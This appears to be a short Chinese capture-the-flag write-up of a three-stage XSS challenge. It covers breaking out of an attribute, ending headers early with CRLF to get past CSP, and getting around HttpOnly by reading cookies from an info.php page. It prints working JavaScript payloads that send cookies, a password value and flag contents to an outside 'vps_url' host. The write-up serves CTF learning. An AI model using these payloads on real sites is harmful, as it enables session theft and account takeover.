第4次写wp好激动

点击加入我们的战队🤓

根据题目，应该是要XSS注入center页面，然后将链接发给三人从而获取cookie

Shad0wWalker

首先尝试alert，查看源码，要先”>闭合

闭合后发现没有被转义，但是也没有触发

查看响应头后发现CSP

同时发现token会出现在响应头中，于是构造111\r\n\r\n111

使得头部报文提前结束，从而绕过CSP

然后直接cookie外带

new Image().src="http://vps_url?name="+document.cookie;

Suzuran

访问flag后，提示开启了httponly

为了绕过，联想到之前在响应头里看到的/info.php

访问后发现该页面可以显示cookie

于是让他访问info并匹配返回的内容中的cookie

var req = new XMLHttpRequest();
req.onload = reqListener;
var url = 'http://127.0.0.1/info.php';
req.withCredentials = true;
req.open('GET', url, false);
req.send();

function reqListener() {
const cookieMatch = this.responseText.match(/password=\w*/);
const sess = cookieMatch[0].trim();
new Image().src="https://vps_url?name="+sess;
};

Sake

这次告诉我们session有效期只有3秒，且访问必须来自本机

所以想到和上一题一样，直接让他访问flag并把内容返回

var req = new XMLHttpRequest();
req.onload = reqListener;
var url = 'http://127.0.0.1/fl4ggggg.php';
req.withCredentials = true;
req.open('GET', url, false);
req.send();
function reqListener() {
new Image().src="http://vps_url?name="+this.responseText;
};